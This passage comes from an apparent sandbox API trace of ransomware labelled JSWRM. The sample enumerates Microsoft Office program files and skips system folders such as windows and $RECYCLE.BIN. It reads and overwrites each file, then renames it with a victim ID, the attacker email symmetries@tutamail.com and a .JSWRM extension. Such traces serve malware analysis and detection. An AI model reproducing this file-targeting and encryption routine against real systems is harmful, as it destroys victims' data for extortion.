lpUsedDefaultChar=0x0) returned 12 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.EXE", lpUsedDefaultChar=0x0) returned 12 [0135.999] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xceb84720, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xceb84720, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd39e5e8b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8cc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msaccess.exe.manifest", cAlternateFileName="MSACCE~1.MAN")) returned 1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2=".") returned 1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="..") returned 1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="...") returned 1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="windows") returned -1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="recovery") returned -1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="perflogs") returned -1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="documents and settings") returned 1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="$RECYCLE.BIN") returned 1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="system volume information") returned -1 [0135.999] lstrcmpiW (lpString1="msaccess.exe.manifest", lpString2="msocache") returned -1 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaccess.exe.manifest", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaccess.exe.manifest", cchWideChar=21, lpMultiByteStr=0x240ef8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msaccess.exe.manifest", lpUsedDefaultChar=0x0) returned 21 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaccess.exe.manifest", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaccess.exe.manifest", cchWideChar=21, lpMultiByteStr=0x241358, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msaccess.exe.manifest", lpUsedDefaultChar=0x0) returned 21 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\msaccess.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msaccess.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.000] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2252) returned 1 [0136.000] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.000] ReadFile (in: hFile=0x45c, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345ec04*=0x8c0, lpOverlapped=0x0) returned 1 [0136.001] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.002] WriteFile (in: hFile=0x45c, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345ec00*=0x8c0, lpOverlapped=0x0) returned 1 [0136.002] CloseHandle (hObject=0x45c) returned 1 [0136.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\msaccess.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msaccess.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\msaccess.exe.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msaccess.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.003] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xedc073c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xedc073c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b250ebf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSACCESS.VisualElementsManifest.xml", cAlternateFileName="MSACCE~1.XML")) returned 1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2=".") returned 1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="..") returned 1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="...") returned 1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="windows") returned -1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0136.003] lstrcmpiW (lpString1="MSACCESS.VisualElementsManifest.xml", lpString2="msocache") returned -1 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 35 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 35 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSACCESS.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msaccess.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.005] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=344) returned 1 [0136.005] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.005] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0136.006] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.006] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0136.006] CloseHandle (hObject=0x45c) returned 1 [0136.006] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSACCESS.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msaccess.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSACCESS.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msaccess.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.007] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbda21cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x16a68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSAEXP30.DLL", cAlternateFileName="")) returned 1 [0136.007] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2=".") returned 1 [0136.007] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="..") returned 1 [0136.007] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="...") returned 1 [0136.007] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="windows") returned -1 [0136.007] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="recovery") returned -1 [0136.007] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="perflogs") returned -1 [0136.008] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="documents and settings") returned 1 [0136.008] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="$RECYCLE.BIN") returned 1 [0136.008] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="system volume information") returned -1 [0136.008] lstrcmpiW (lpString1="MSAEXP30.DLL", lpString2="msocache") returned -1 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAEXP30.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAEXP30.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSAEXP30.DLL", lpUsedDefaultChar=0x0) returned 12 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAEXP30.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAEXP30.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSAEXP30.DLL", lpUsedDefaultChar=0x0) returned 12 [0136.008] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x104d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSBARCODE.DLL", cAlternateFileName="MSBARC~1.DLL")) returned 1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2=".") returned 1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="..") returned 1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="...") returned 1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="windows") returned -1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="recovery") returned -1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="perflogs") returned -1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="documents and settings") returned 1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="system volume information") returned -1 [0136.008] lstrcmpiW (lpString1="MSBARCODE.DLL", lpString2="msocache") returned -1 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSBARCODE.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSBARCODE.DLL", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSBARCODE.DLL", lpUsedDefaultChar=0x0) returned 13 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSBARCODE.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSBARCODE.DLL", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSBARCODE.DLL", lpUsedDefaultChar=0x0) returned 13 [0136.008] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc522eecb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc522eecb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc5255140, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7cm_en.dub", cAlternateFileName="MSCSS7~4.DUB")) returned 1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2=".") returned 1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="..") returned 1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="...") returned 1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="windows") returned -1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="recovery") returned -1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="perflogs") returned -1 [0136.008] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="documents and settings") returned 1 [0136.009] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="$RECYCLE.BIN") returned 1 [0136.009] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="system volume information") returned -1 [0136.009] lstrcmpiW (lpString1="mscss7cm_en.dub", lpString2="msocache") returned -1 [0136.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_en.dub", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_en.dub", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7cm_en.dub", lpUsedDefaultChar=0x0) returned 15 [0136.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_en.dub", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_en.dub", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7cm_en.dub", lpUsedDefaultChar=0x0) returned 15 [0136.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.009] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4096) returned 1 [0136.009] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.010] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1000, lpOverlapped=0x0) returned 1 [0136.012] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.012] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1000, lpOverlapped=0x0) returned 1 [0136.012] CloseHandle (hObject=0x45c) returned 1 [0136.012] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_en.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_en.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_en.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.013] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc522eecb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc522eecb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc5255140, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7cm_es.dub", cAlternateFileName="MS02C4~1.DUB")) returned 1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2=".") returned 1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="..") returned 1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="...") returned 1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="windows") returned -1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="recovery") returned -1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="perflogs") returned -1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="documents and settings") returned 1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="$RECYCLE.BIN") returned 1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="system volume information") returned -1 [0136.013] lstrcmpiW (lpString1="mscss7cm_es.dub", lpString2="msocache") returned -1 [0136.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_es.dub", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_es.dub", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7cm_es.dub", lpUsedDefaultChar=0x0) returned 15 [0136.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_es.dub", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_es.dub", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7cm_es.dub", lpUsedDefaultChar=0x0) returned 15 [0136.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_es.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.014] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3072) returned 1 [0136.014] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.014] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc00, lpOverlapped=0x0) returned 1 [0136.016] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.016] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc00, lpOverlapped=0x0) returned 1 [0136.016] CloseHandle (hObject=0x45c) returned 1 [0136.016] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_es.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_es.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_es.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_es.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.017] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5196662, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5196662, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc51bc7d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7cm_fr.dub", cAlternateFileName="MSCSS7~2.DUB")) returned 1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2=".") returned 1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="..") returned 1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="...") returned 1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="windows") 